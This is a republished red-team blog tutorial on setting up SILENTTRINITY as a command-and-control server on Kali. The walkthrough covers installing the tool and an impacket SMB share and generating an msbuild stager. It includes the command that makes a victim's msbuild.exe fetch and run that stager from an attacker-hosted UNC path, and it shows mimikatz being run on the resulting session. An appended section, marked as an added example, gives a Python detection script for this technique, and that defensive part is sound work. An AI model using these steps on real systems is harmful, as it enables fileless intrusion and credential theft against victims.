
The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

[ System (Linux) | Category: System (Linux) | Publisher: 店小二04 | Date: 2018 | Author: 红领巾 ]

There’s been a disturbance in the red team field, have you felt it? It’s C#. More mature environments have finally caught on that Powershell can be used for malicious gains and pentesters could own your domain with a few Powershell commands, so admins have begun to lock it down, EDRs have begun to alert, and thus, as the saying goes, necessity is the mother of invention.

So why C#? Simply put, it has access to the .NET framework like Powershell does. The other big reason is that Microsoft has unsigned executables that will compile and execute C# code that are installed by default with Windows 10. Matt Graeber found one of the executables and did an excellent write-up of it here. The TL;DR of it is that Microsoft.Workflow.Compiler.exe, which is installed as part of the .NET framework, will run C# code that is in an XOML file. There’s been a huge movement to use LOL (living off the land) tactics, meaning use what you have at your disposal instead of downloading things to victim machines, so this discovery was huge. Of course, people immediately started to look at how to weaponize this for another binary that will compile and run code via XML ― msbuild.exe. byt3bl33d3r, who wrote CrackMapExec, Empire, and DeathStar, developed a tool called SILENTTRINITY, which uses IronPython so that Python can execute C#. This is how it works:

Using Kali, install Python3

apt-get install python3.7
apt-get install python3.7-dev

Then download SILENTTRINITY

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Then install the requirements.

cd SILENTTRINITY
python3.7 -m pip install -r requirements.txt

Then start SILENTTRINITY

cd Server
python3.7 st.py

Before starting SILENTTRINITY we’ll spin up a Samba server so that we don’t have to drop files to disk on the target and instead fetch the payload via SMB path. To do this, impacket has a set of tools in their github repository here, one of which is smbserver.py which will spin up a quick SMB server.

First download & install the impacket repository

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

Then create a folder that will be shared

mkdir /root/SMB

Then run smbserver.py. Since it was ‘installed’, it can be run from anywhere via

smbserver.py SMB /root/SMB

[screenshot]

Then start SILENTTRINITY

cd SILENTTRINITY/Server/
python3.7 st.py

You should then be seeing this


[screenshot]

Next is to spin up an HTTP listener, as shown below.


[screenshot]

Once that is spun up, next is to generate the actual stager, which is what will be executed. In this case, we’re using msbuild.


[screenshot]

The XML file is generated in the same directory as st.py, so copy that to the Samba share that was made which in this case is at /root/SMB.

cp msbuild.xml /root/SMB

[screenshot]

Finally, the trick is to get the victim to execute the XML file via the SMB path.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.43.248\SMB\msbuild.xml

[screenshot]

You’ll see a command prompt open up and if you look back at SILENTTRINITY, you’ll have a session.


[screenshot]

And to list the sessions:


[screenshot]

Now you can use modules against that session, like in Empire.


[screenshot]

e.g. mimikatz


[screenshot]

The purpose of this is to show that you never have to drop files to disk and can actually execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug in msbuild.exe or Microsoft.Workflow.Compiler.exe: those binaries are meant to do this; we’re just exploiting it for offensive purposes.
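From the defender's side, the behaviour described above (a .NET build binary being handed a project file from a UNC path) is what process-creation telemetry can catch. The following is an added example, not code from the original post or from SILENTTRINITY: it triages constructed Sysmon-like process-creation records and flags msbuild.exe or Microsoft.Workflow.Compiler.exe launched against a share-hosted or local .xml/.xoml file. The record format, field names and sample values are assumptions.

```python
import re
from typing import Dict, Iterable, List

# Microsoft-supplied binaries that compile and run code read from an XML/XOML
# project file; the post's stager relies on exactly this behaviour.
INLINE_CODE_BUILDERS = ("msbuild.exe", "microsoft.workflow.compiler.exe")
# Interactive or scripting parents that rarely launch a legitimate build.
SCRIPT_PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")
# A UNC argument (\\host\share\file) means the project file was never written
# to local disk, the \\192.168.43.248\SMB\msbuild.xml pattern from the post.
UNC_PATH = re.compile(r"(?<!\S)\\\\[^\\\s]+\\\S+")
PROJECT_XML = re.compile(r"\.(xml|xoml)\b", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value|key=value' process-creation record."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event: Dict[str, str]) -> str:
    """Return 'alert', 'review' or 'ignore' for one process-creation event."""
    if basename(event.get("Image", "")) not in INLINE_CODE_BUILDERS:
        return "ignore"
    cmd = event.get("CommandLine", "")
    if UNC_PATH.search(cmd):
        return "alert"   # build tool fed a project straight from a share
    if PROJECT_XML.search(cmd):
        return "review"  # local .xml/.xoml instead of a normal .csproj/.sln
    if basename(event.get("ParentImage", "")) in SCRIPT_PARENTS:
        return "review"  # build launched from a shell, not an IDE or build agent
    return "ignore"

def triage(lines: Iterable[str]) -> List[str]:
    return [classify(parse_event(line)) for line in lines]

# Constructed sample events with Sysmon-like field names (not real telemetry).
SAMPLE_EVENTS = [
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe|CommandLine=msbuild.exe \\192.168.43.248\SMB\msbuild.xml|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe|CommandLine=msbuild.exe C:\src\app\app.csproj /t:Build|ParentImage=C:\Program Files\Microsoft Visual Studio\devenv.exe",
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe|CommandLine=Microsoft.Workflow.Compiler.exe C:\Users\bob\AppData\Local\Temp\in.xml out.xml|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe|CommandLine=msbuild.exe C:\src\app\app.csproj|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe \\fileserver\docs\notes.txt|ParentImage=C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(verdict.upper().ljust(7), parse_event(line)["CommandLine"])
```

The UNC rule is the high-confidence signal; the parent-process and .xml rules are there to surface local variants for review rather than to alert on every developer build.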

Page link: https://www.codesec.net/view/604898.html